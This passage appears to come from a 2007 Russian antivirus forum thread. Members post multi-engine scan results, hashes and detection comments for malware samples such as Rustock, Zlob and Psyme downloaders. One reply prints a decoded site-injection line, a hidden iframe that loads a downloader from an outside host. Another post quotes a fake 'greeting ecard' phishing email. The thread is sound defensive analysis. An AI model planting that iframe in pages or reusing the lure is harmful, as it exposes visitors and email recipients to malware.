CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.17 no virus found
DrWeb 4.33 2007.07.18 no virus found
[B]eSafe 7.0.15.0 2007.07.17 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.17 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.17 no virus found
[B]Kaspersky 4.0.2.24 2007.07.18 Virus.Win32.Sosisko.a[/B]
McAfee 5076 2007.07.17 no virus found
Microsoft 1.2704 2007.07.17 no virus found
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.18 VIPRE.Suspicious[/B]
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
[B]VBA32 3.12.2 2007.07.17 suspected of Embedded.SpamTool.Win32.Agent.u[/B]
VirusBuster 4.3.23:9 2007.07.17 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.17 Win32.Malware.gen!90 (suspicious)[/B][/QUOTE]
-
File index.rar received on 07.18.2007 08:11:48 (CET)
Current status: finished
Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
[B]AntiVir 7.4.0.42 2007.07.17 EXP/VML-Fill.A[/B]
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.18 no virus found
[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
[B]Fortinet 2.91.0.0 2007.07.18 JS/WebAttacker!exploit[/B]
F-Prot 4.3.2.48 2007.07.17 no virus found
[B]F-Secure 6.70.13030.0 2007.07.17 Trojan-Downloader.JS.Psyme.hu
Ikarus T3.1.1.8 2007.07.18 Trojan-Downloader.JS.Psyme.hu
Kaspersky 4.0.2.24 2007.07.18 Trojan-Downloader.JS.Psyme.hu
McAfee 5076 2007.07.17 JS/Downloader-AUD
Microsoft 1.2704 2007.07.17 TrojanDownloader:JS/Psyme.gen[/B]
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
Sunbelt 2.2.907.0 2007.07.18 no virus found
Symantec 10 2007.07.18 no virus found
[B]TheHacker 6.1.7.148 2007.07.16 Trojan/Downloader.vbs[/B]
VBA32 3.12.2 2007.07.17 no virus found
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Psyme.DD.Gen
Webwasher-Gateway 6.0.1 2007.07.17 Exploit.VML-Fill.A[/B]
Aditional information
File size: 3905 bytes
MD5: 7d1cc59e55db21e8599ddf9f58851fbc
SHA1: 1b4de7d587522df2325bbb1178150a2d0b6ff143
-
Продолжение предыдущего:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
Current status: Loading ... finished
Loading server information...
Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.18 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
CAT-QuickHeal 9.00 2007.07.17 no virus found
ClamAV devel-20070416 2007.07.18 no virus found
[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3790 2007.07.17 no virus found
Ewido 4.0 2007.07.17 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.17 no virus found
Ikarus T3.1.1.8 2007.07.18 no virus found
Kaspersky 4.0.2.24 2007.07.18 no virus found
McAfee 5076 2007.07.17 no virus found
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:JS/Psyme.gen[/B]
NOD32v2 2404 2007.07.17 no virus found
Norman 5.80.02 2007.07.17 no virus found
Panda 9.0.0.4 2007.07.17 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
Sunbelt 2.2.907.0 2007.07.18 no virus found
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
VBA32 3.12.2 2007.07.17 no virus found
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Agent.B[/B]
[B]Webwasher-Gateway 6.0.1 2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)[/B]
Aditional information
File size: 8413 bytes
MD5: 38ddab82dcea800e2545ef6f7fe2bc1b
SHA1: c87072b1b9ca09ae540d041d711c5353a1839c29
[size="1"][color="#666686"][B]Добавлено через 4 часа 2 минуты[/B][/color][/size]
Из [URL="http://virusinfo.info/showthread.php?p=123479#post123479"]темы[/URL]
File realfoto.exe received on 07.18.2007 14:07:57 (CET)
Current status: Loading ... finished
Loading server information...
Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.18.0 2007.07.18 no virus found
AntiVir 7.4.0.42 2007.07.18 no virus found
Authentium 4.93.8 2007.07.18 no virus found
[B]Avast 4.7.997.0 2007.07.17 Win32:Small-GYA[/B]
AVG 7.5.0.476 2007.07.17 no virus found
[B]BitDefender 7.2 2007.07.17 Dropped:Trojan.Downloader.Small.AET[/B]
[B]CAT-QuickHeal 9.00 2007.07.17 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.18 no virus found
DrWeb 4.33 2007.07.18 no virus found
eSafe 7.0.15.0 2007.07.17 no virus found
eTrust-Vet 30.8.3791 2007.07.18 no virus found
Ewido 4.0 2007.07.18 no virus found
FileAdvisor 1 2007.07.18 no virus found
Fortinet 2.91.0.0 2007.07.18 no virus found
F-Prot 4.3.2.48 2007.07.17 no virus found
F-Secure 6.70.13030.0 2007.07.18 no virus found
[B]Ikarus T3.1.1.8 2007.07.18 Trojan-Downloader.Win32.Small.ehu[/B]
Kaspersky 4.0.2.24 2007.07.18 no virus found
[B]McAfee 5076 2007.07.17 Generic Downloader[/B]
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:Win32/Agent.WX[/B]
[B]NOD32v2 2404 2007.07.17 probably a variant of Win32/TrojanDownloader.Small.DRU[/B]
Norman 5.80.02 2007.07.18 no virus found
[B]Panda 9.0.0.4 2007.07.18 Suspicious file[/B]
[B]Sophos 4.19.0 2007.07.17 Mal/Packer[/B]
[B]Sunbelt 2.2.907.0 2007.07.18 VIPRE.Suspicious[/B]
Symantec 10 2007.07.18 no virus found
TheHacker 6.1.7.148 2007.07.16 no virus found
[B]VBA32 3.12.2 2007.07.17 Trojan.Win32.TrojanDownloader.Small.DRU[/B]
VirusBuster 4.3.23:9 2007.07.17
[B]Webwasher-Gateway 6.0.1 2007.07.18 Packer.FSG[/B]
Aditional information
File size: 2625 bytes
MD5: ba0b2e8dc204a4b227a3b106070b76d3
SHA1: 0794eb98b6013c452c6b0a770e7a672005d91b82
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
-
[quote=icon;123441]Продолжение предыдущего:
zhestclub. ru
File zhestclub.htm received on 07.18.2007 10:12:25 (CET)
[B]DrWeb 4.33 2007.07.18 VBS.PackFor[/B]
[/quote]
Позволю себе усомниться в этом детекте. Все, что делает этот "вредоносный скрипт", это пишет в документ строку
[code]<iframe src='http://bsdpng.info/error/' width=1 height=1 style='visibility: hidden;'></iframe>[/code], то есть является пускачом для расположенного по указанному адресу классического Psyme. Сам по себе этот скрипт безвреден. По сути, мы наблюдаем классический инжект в сайт, а DrWeb положил маску на яваскрипт-пакер. Вот такие детекты являются более правильными (хотя все равно - некорректными для статистики Вирусинфо):
[quote=icon;123441]
[B]Microsoft 1.2704 2007.07.18 TrojanDownloader:JS/Psyme.gen[/B]
[B]Sophos 4.19.0 2007.07.17 Mal/ObfJS-A[/B]
[B]VirusBuster 4.3.23:9 2007.07.17 JS.Agent.B[/B]
[B]Webwasher-Gateway 6.0.1 2007.07.18 JavaScript.CodeUnfolding.gen!High (suspicious)[/B]
[/quote]
-
[QUOTE]File ecard.exe received on 07.19.2007 21:15:51 (CET)
Current status: finished
Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.20.0 2007.07.19 no virus found
[B]AntiVir 7.4.0.44 2007.07.19 WORM/Zhelatin.Gen[/B]
Authentium 4.93.8 2007.07.19 no virus found
[B]Avast 4.7.997.0 2007.07.19 Win32:Tibs-BBG[/B]
AVG 7.5.0.476 2007.07.19 no virus found
[B]BitDefender 7.2 2007.07.19 Trojan.Peed.IAM
CAT-QuickHeal 9.00 2007.07.19 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.19 no virus found
DrWeb 4.33 2007.07.19 no virus found
[B]eSafe 7.0.15.0 2007.07.19 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3794 2007.07.19 no virus found
Ewido 4.0 2007.07.19 no virus found
FileAdvisor 1 2007.07.19 no virus found
Fortinet 2.91.0.0 2007.07.19 no virus found
F-Prot 4.3.2.48 2007.07.19 no virus found
F-Secure 6.70.13030.0 2007.07.19 no virus found
Ikarus T3.1.1.8 2007.07.19 no virus found
Kaspersky 4.0.2.24 2007.07.19 no virus found
McAfee 5078 2007.07.19 no virus found
[B]Microsoft 1.2704 2007.07.19 Trojan:Win32/Tibs.Q[/B]
NOD32v2 2408 2007.07.19 no virus found
Norman 5.80.02 2007.07.19 no virus found
Panda 9.0.0.4 2007.07.19 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/Dorf-A[/B]
Sunbelt 2.2.907.0 2007.07.19 no virus found
[B]Symantec 10 2007.07.19 Trojan.Packed.13[/B]
TheHacker 6.1.7.149 2007.07.18 no virus found
VBA32 3.12.2.1 2007.07.19 no virus found
VirusBuster 4.3.26:9 2007.07.19 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.19 Worm.Zhelatin.Gen[/B]
Aditional information
File size: 139173 bytes
MD5: 765922b7967bc7b832a2a4c89dce3068
SHA1: b57ce29554bb404c236fc864cf586ca582f967fb[/QUOTE]
Седьмой KIS последнего билда тоже не детектит в режиме максимальной эвристики, хотя еще пару дней назад файлы из аналогичных писем ловились как [B]trojan.generic[/B]
А писем такого рода приходит по 5-10 шт. в день:
[QUOTE]Hi. School mate has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.
SEEING YOUR CARD
If your email software creates links to Web pages, click on your card's direct www address below while you are connected to the Internet:
[url]http://72.230.33.160/*****************[/url]
Or copy and paste it into your browser's "Location" box (where Internet addresses go).
We hope you enjoy your awesome card.
Wishing you the best,
Webmaster,
greetingcard.org[/QUOTE]
-
В защиту Microsoft -)
Antivirus Version Last Update Result
AhnLab-V32007.7.20.02007.07.19no virus found
[B]AntiVir[/B][B]7.4.0.44[/B][B]2007.07.19[/B][B]WORM/Zhelatin.Gen[/B]
Authentium4.93.82007.07.19no virus found
[B]Avast[/B][B]4.7.997.0[/B][B]2007.07.19[/B][B]Win32:Tibs-BBG[/B]
AVG7.5.0.4762007.07.18no virus found
[B]BitDefender[/B][B]7.2[/B][B]2007.07.19[/B][B]Trojan.Peed.IAM[/B]
CAT-QuickHeal9.002007.07.19(Suspicious) - DNAScan
ClamAVdevel-200704162007.07.19 no virus found
DrWeb4.332007.07.19no virus found
[B]eSafe[/B][B]7.0.15.0[/B][B]2007.07.17[/B][B]Suspicious Trojan/Worm[/B]
[B]eTrust-Vet[/B][B]30.8.3794[/B][B]2007.07.19[/B][B]Win32/Sintun[/B]
Ewido4.02007.07.19no virus found
FileAdvisor12007.07.19no virus found
Fortinet2.91.0.02007.07.19no virus found
F-Prot4.3.2.482007.07.19no virus found
F-Secure6.70.13030.02007.07.19no virus found
IkarusT3.1.1.82007.07.19no virus found
Kaspersky4.0.2.242007.07.19no virus found
McAfee50782007.07.19no virus found
[COLOR=Red][B]Microsoft[/B][/COLOR][COLOR=Red][B]1.2704[/B][/COLOR][COLOR=Red][B]2007.07.19[/B][/COLOR][COLOR=Red][B]TrojanDropper:Win32/Tibs.O[/B][/COLOR]
NOD32v224072007.07.19no virus found
Norman5.80.022007.07.19no virus found
Panda9.0.0.42007.07.19no virus found
[B]Sophos[/B][B]4.19.0[/B][B]2007.07.17[/B][B]Mal/Dorf-A[/B]
Sunbelt2.2.907.02007.07.19no virus found
[B]Symantec[/B][B]10[/B][B]2007.07.19[/B][B]Trojan.Packed.13[/B]
TheHacker6.1.7.1492007.07.18no virus found
VBA323.12.2.12007.07.19no virus found
VirusBuster4.3.26:92007.07.19no virus found
[B]Webwasher-Gateway[/B][B]6.0.1[/B][B]2007.07.19[/B][B]Worm.Zhelatin.Gen[/B]
-
поймал ручками в \system32\drivers
File firelm01.sys received on 07.21.2007 11:37:32 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.20 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.20 no virus found
BitDefender 7.2 2007.07.21 no virus found
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.20 no virus found
Ikarus T3.1.1.8 2007.07.21 no virus found
[B]Kaspersky 4.0.2.24 2007.07.21 Backdoor.Win32.Hackdoor.g[/B]
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.21 no virus found
NOD32v2 2410 2007.07.20 no virus found
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.20 no virus found
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.21 no virus found
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.20 no virus found
Webwasher-Gateway 6.0.1 2007.07.21 no virus found
Additional information
File size: 32855 bytes
MD5: 98638f2f168f5856d11083c1f5843ba2
SHA1: 9cc547244ffaf8c4a1d43abdd2a742f47c8295cd
add:[QUOTE]мой пост [url]http://virusinfo.info/showpost.php?p...&postcount=227[/url]
ошибка вирусного аналитика ЛК (я отослал в вирлаб, пришел ответ что найдено новое вредоносное программное обеспечение)а это компонент файрвола [/QUOTE]
-
File avz00001.dta received on 07.21.2007 13:12:23 (CET)[QUOTE]AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.20 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.20 no virus found
[B]BitDefender 7.2 2007.07.21 Trojan.Rootkit.Loader.A[/B]
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
[B]eTrust-Vet 30.8.3797 2007.07.20 Win32/Higlieder.AI[/B]
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
Fortinet 2.91.0.0 2007.07.21 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.20 no virus found
[B]Ikarus T3.1.1.8 2007.07.21 Trojan.Rootkit.Loader.A[/B]
Kaspersky 4.0.2.24 2007.07.21 no virus found
McAfee 5079 2007.07.20 no virus found
[B]Microsoft 1.2704 2007.07.21 VirTool:WinNT/Higlieder.E
NOD32v2 2410 2007.07.20 Win32/Bagle.IX[/B]
Norman 5.80.02 2007.07.20 no virus found
Panda 9.0.0.4 2007.07.20 no virus found
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.21 VIPRE.Suspicious[/B]
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.20 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.21 Win32.Malware.gen (suspicious)[/B][/QUOTE]
-
File bcqr00001.dat received on 07.21.2007 21:25:06 (CET)
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
AntiVir 7.4.0.44 2007.07.21 no virus found
Authentium 4.93.8 2007.07.20 no virus found
Avast 4.7.997.0 2007.07.20 no virus found
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.21 no virus found
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.21 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.21 no virus found
[B][COLOR="Red"][COLOR="Red"]Fortinet 2.91.0.0 2007.07.21 RKRustok.A[/COLOR][/COLOR][/B]
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
Ikarus T3.1.1.8 2007.07.21 no virus found
Kaspersky 4.0.2.24 2007.07.21 no virus found
McAfee 5079 2007.07.20 no virus found
[COLOR="Red"][B]Microsoft 1.2704 2007.07.21 Trojan:Win32/Rustock.gen!C[/B][/COLOR]
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[COLOR="Red"][B]Panda 9.0.0.4 2007.07.21 Rootkit/NetFrame
Sophos 4.19.0 2007.07.17 Mal/RKRustok-A
Sunbelt 2.2.907.0 2007.07.21 Backdoor.Rustock[/B][/COLOR]
Symantec 10 2007.07.21 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B][COLOR="Red"]Webwasher-Gateway 6.0.1 2007.07.21 Win32.Malware.gen!82 [/COLOR][/B](suspicious)
[/QUOTE]
Additional information
File size: 61114 bytes
MD5: 8c1d95da9e9085b8c2b13556b3dd95d3
SHA1: 28a2dce0dfd8355c5f011c6c0ab03e2df1bb896e
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.
[size="1"][color="#666686"][B]Добавлено через 3 часа 21 минуту[/B][/color][/size]
File avz00002.dta received on 07.22.2007 00:45:31 (CET)
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
[COLOR="Red"][B]AntiVir 7.4.0.44 2007.07.21 TR/Rootkit.Gen[/B][/COLOR]
Authentium 4.93.8 2007.07.20 no virus found
[COLOR="Red"][B]Avast 4.7.997.0 2007.07.20 Win32:Trojan-gen. {Other}[/B][/COLOR]
AVG 7.5.0.476 2007.07.21 no virus found
[COLOR="Red"][B]BitDefender 7.2 2007.07.21 Backdoor.Rustock.B[/B][/COLOR]
CAT-QuickHeal 9.00 2007.07.20 no virus found
ClamAV devel-20070416 2007.07.22 no virus found
DrWeb 4.33 2007.07.21 no virus found
[COLOR="Red"][B]eSafe 7.0.15.0 2007.07.19 Win32.Rustock.B[/B][/COLOR]
eTrust-Vet 30.8.3797 2007.07.20 no virus found
[COLOR="Red"][B]Ewido 4.0 2007.07.21 Rootkit.Small[/B][/COLOR]
FileAdvisor 1 2007.07.22 no virus found
[COLOR="Red"][B]Fortinet 2.91.0.0 2007.07.21 W32/RUSTOCK.AM!tr.bdr[/B][/COLOR]
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
[COLOR="Red"][B]Ikarus T3.1.1.8 2007.07.21 Backdoor.Rustock.B[/B][/COLOR]
Kaspersky 4.0.2.24 2007.07.22 no virus found
[B][COLOR="Red"]McAfee 5079 2007.07.20 Spam-Mailbot.c!Rootkit
Microsoft 1.2704 2007.07.21 Trojan:Win32/Rustock[/COLOR][/B]
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[COLOR="Red"][B]Panda 9.0.0.4 2007.07.22 Trj/Clicker.WM
Sophos 4.19.0 2007.07.17 Mal/RKRustok-A
Sunbelt 2.2.907.0 2007.07.21 Backdoor.Rustock
Symantec 10 2007.07.22 Backdoor.Rustock.B[/B][/COLOR]
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B][COLOR="Red"]Webwasher-Gateway 6.0.1 2007.07.22 Trojan.Rootkit.Gen[/COLOR][/B][/QUOTE]
Additional information
File size: 80488 bytes
MD5: 95a506f62ce73818fa6e27d1c052b711
SHA1: 6d880bc775e46e0a26859003dcfb44b26e076276
Sunbelt info: Backdoor.Rustock is a threat that acts as a hidden proxy and enables an attacker to send spam from the machine.
-
File 1.exe received on 07.22.2007 10:10:16 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.21.0 2007.07.20 no virus found
[B]AntiVir 7.4.0.44 2007.07.21 HEUR/Malware[/B]
Authentium 4.93.8 2007.07.20 no virus found
[B]Avast 4.7.997.0 2007.07.22 Win32:Delf-CAT[/B]
AVG 7.5.0.476 2007.07.21 no virus found
BitDefender 7.2 2007.07.22 no virus found
[B]CAT-QuickHeal 9.00 2007.07.20 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.22 no virus found
DrWeb 4.33 2007.07.21 no virus found
eSafe 7.0.15.0 2007.07.19 no virus found
eTrust-Vet 30.8.3797 2007.07.20 no virus found
Ewido 4.0 2007.07.21 no virus found
FileAdvisor 1 2007.07.22 no virus found
Fortinet 2.91.0.0 2007.07.22 no virus found
F-Prot 4.3.2.48 2007.07.20 no virus found
F-Secure 6.70.13030.0 2007.07.21 no virus found
[B]Ikarus T3.1.1.8 2007.07.22 Trojan-PWS.Win32.Kapod[/B]
Kaspersky 4.0.2.24 2007.07.22 no virus found
McAfee 5079 2007.07.20 no virus found
Microsoft 1.2704 2007.07.22 no virus found
NOD32v2 2411 2007.07.21 no virus found
Norman 5.80.02 2007.07.20 no virus found
[B]Panda 9.0.0.4 2007.07.22 Suspicious file[/B]
Sophos 4.19.0 2007.07.17 no virus found
[B]Sunbelt 2.2.907.0 2007.07.21 VIPRE.Suspicious[/B]
Symantec 10 2007.07.22 no virus found
TheHacker 6.1.7.150 2007.07.21 no virus found
VBA32 3.12.2.1 2007.07.21 no virus found
VirusBuster 4.3.26:9 2007.07.21 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.22 Heuristic.Malware[/B]
Additional information
File size: 264192 bytes
MD5: 849f0a1fcbfc7752368131947228790d
SHA1: 33d8313e504f36cbd8a45ea1de5a92d50b95c37f
packers: ASProtect
packers: PE_Patch, Aspack
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
-
Antivirus Version Last Update Result
AhnLab-V3 2007.7.25.0 2007.07.24 no virus found
AntiVir 7.4.0.44 2007.07.24 no virus found
Authentium 4.93.8 2007.07.25 no virus found
[B]Avast 4.7.997.0 2007.07.25 Win32:Trojan-gen. {Other}
AVG 7.5.0.476 2007.07.25 Downloader.Zlob.HN
BitDefender 7.2 2007.07.25 Trojan.Downloader.Zlob.AAEE [/B]
CAT-QuickHeal 9.00 2007.07.24 no virus found
ClamAV devel-20070416 2007.07.25 no virus found
DrWeb 4.33 2007.07.25 no virus found
eSafe 7.0.15.0 2007.07.24 no virus found
eTrust-Vet 31.1.5003 2007.07.24 no virus found
Ewido 4.0 2007.07.24 no virus found
FileAdvisor 1 2007.07.25 no virus found
Fortinet 2.91.0.0 2007.07.25 no virus found
F-Prot 4.3.2.48 2007.07.25 no virus found
[B]F-Secure 6.70.13030.0 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn [/B]
Ikarus T3.1.1.8 2007.07.24 no virus found
[B]Kaspersky 4.0.2.24 2007.07.25 Trojan-Downloader.Win32.Zlob.bxn [/B]
McAfee 5081 2007.07.24 no virus found
[B]Microsoft 1.2704 2007.07.25 TrojanDownloader:Win32/Zlob[/B]
NOD32v2 2418 2007.07.25 no virus found
[B]Norman 5.80.02 2007.07.24 DNSChanger.gen10[/B]
Panda 9.0.0.4 2007.07.24 no virus found
[B]Sophos 4.19.0 2007.07.17 Mal/Zlob-A [/B]
Sunbelt 2.2.907.0 2007.07.25 no virus found
Symantec 10 2007.07.25 no virus found
TheHacker 6.1.7.152 2007.07.23 no virus found
VBA32 3.12.2.1 2007.07.24 no virus found
VirusBuster 4.3.26:9 2007.07.24 no virus found
Webwasher-Gateway 6.0.1 2007.07.25 no virus found
[size="1"][color="#666686"][B]Добавлено через 2 минуты[/B][/color][/size]
+ тоже самое с сайта Касперского
Проверенный файл: setup.exe - Инфицирован
setup.exe/stream/Script - в порядке
setup.exe/stream/data0001 - в порядке
setup.exe/stream/data0002 - в порядке
setup.exe/stream/data0003 - в порядке
setup.exe/stream/data0004 - в порядке
setup.exe/stream/data0005 - в порядке
[B]setup.exe/stream/data0006 - инфицирован Trojan-Downloader.Win32.Zlob.bxn[/B]
setup.exe/stream/data0007 - в порядке
setup.exe/stream/data0008 - в порядке
-
File svc.exe received on 07.26.2007 06:25:17 (CET)
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.26.0 2007.07.25 no virus found
[B]AntiVir 7.4.0.50 2007.07.25 HEUR/Crypted[/B]
Authentium 4.93.8 2007.07.25 no virus found
Avast 4.7.997.0 2007.07.26 no virus found
AVG 7.5.0.476 2007.07.25 no virus found
BitDefender 7.2 2007.07.26 no virus found
[B]CAT-QuickHeal 9.00 2007.07.25 (Suspicious) - DNAScan[/B]
ClamAV 0.91 2007.07.26 no virus found
DrWeb 4.33 2007.07.26 no virus found
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5004 2007.07.25 no virus found
Ewido 4.0 2007.07.25 no virus found
FileAdvisor 1 2007.07.26 no virus found
Fortinet 2.91.0.0 2007.07.26 no virus found
F-Prot 4.3.2.48 2007.07.25 no virus found
F-Secure 6.70.13030.0 2007.07.26 no virus found
Ikarus T3.1.1.8 2007.07.25 no virus found
Kaspersky 4.0.2.24 2007.07.26 no virus found
McAfee 5083 2007.07.26 no virus found
Microsoft 1.2704 2007.07.25 no virus found
NOD32v2 2421 2007.07.26 no virus found
Norman 5.80.02 2007.07.25 no virus found
Panda 9.0.0.4 2007.07.26 Suspicious file
Sophos 4.19.0 2007.07.17 no virus found
Sunbelt 2.2.907.0 2007.07.26 no virus found
Symantec 10 2007.07.26 no virus found
TheHacker 6.1.7.153 2007.07.25 no virus found
[B]VBA32 3.12.2.1 2007.07.24 suspected of Embedded.Trojan-Downloader.Win32.Small.dge[/B]
VirusBuster 4.3.26:9 2007.07.25 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.26 Win32.NewMalware.BA!4538!2[/B][/QUOTE]
Additional information
File size: 4538 bytes
MD5: a5da3a9c3b0e2b5034b3ec49cbb3a60f
SHA1: 2dca577caf641a2b4e3972902b65b7b1342fab34
-
[url]http://virusinfo.info/showthread.php?t=11350[/url]
[QUOTE]
Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 PSW.Generic4.ZKV
BitDefender 7.2 2007.07.26 MemScan:Trojan.Spy.Nuklus.D
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm
eTrust-Vet 31.1.5004 2007.07.25 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 VirTool:Win32/Obfuscator.C
NOD32v2 2423 2007.07.26 a variant of Win32/Spy.Nuklus
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 Suspicious file
Rising 19.33.32.00 2007.07.26 -
Prevx1 V2 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 VIPRE.Suspicious
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
